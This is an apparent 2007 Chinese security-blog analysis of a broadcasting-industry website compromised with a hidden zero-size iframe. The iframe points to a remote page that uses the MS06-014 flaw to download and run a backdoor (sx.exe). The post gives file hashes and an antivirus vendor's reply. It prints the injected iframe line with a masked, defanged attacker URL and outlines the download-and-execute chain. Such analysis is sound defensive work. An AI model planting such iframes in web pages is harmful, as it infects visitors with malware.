某广电行业网站被挂马 Backdoor.Win32.Gpigeon.aic/ sx.exe
endurer 原创
2007-09-06 第1版
网站页面被植入代码:
/---
<iframe src=hxxp://www.h**l*bz.com/x*j***/Dns.htm width=0 height=0>
---/
hxxp://www.h**l*bz.com/x*j***/Dns.htm 包含 JavaScript脚本,首先输出escape编码的信息:
/---
www.CuteQq.cnZJWm 6 Beta 3
---/
接着利用 MS06014 漏洞,下载 sx.exe,保存为 %system32%/Cuteqq_Cn.exe,再用 shell.execute来运行。
文件说明符 : d:/test/sx.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-9-5 12:46:20
修改时间 : 2007-9-5 12:46:56
访问时间 : 2007-9-5 0:0:0
大小 : 284672 字节 278.0 KB
MD5 : 2262830c8f7f932cf08ed1a296b2acaa
HSA1: 6F8B603FB869F52960184E843A724677115C0A97
使用的是WMP媒体文件的图标
Kasepersky 报为 Packed.Win32.Klone.af
主 题: | 病毒上报邮件分析结果-流水单号:20070905125954073811 | |
发件人: | "" <send@rising.net.cn> | 发送时间2007.09.05 14:16 |
尊敬的客户,您好!
您的邮件已经收到,感谢您对瑞星的支持。
我们已经详细分析过您的问题和文件,以下是您上传的文件的分析结果:
1.文件名:sx.exe
病毒名:
Backdoor.Win32.Gpigeon.aic
您所上报的病毒文件将在19.39.30版本中处理解决。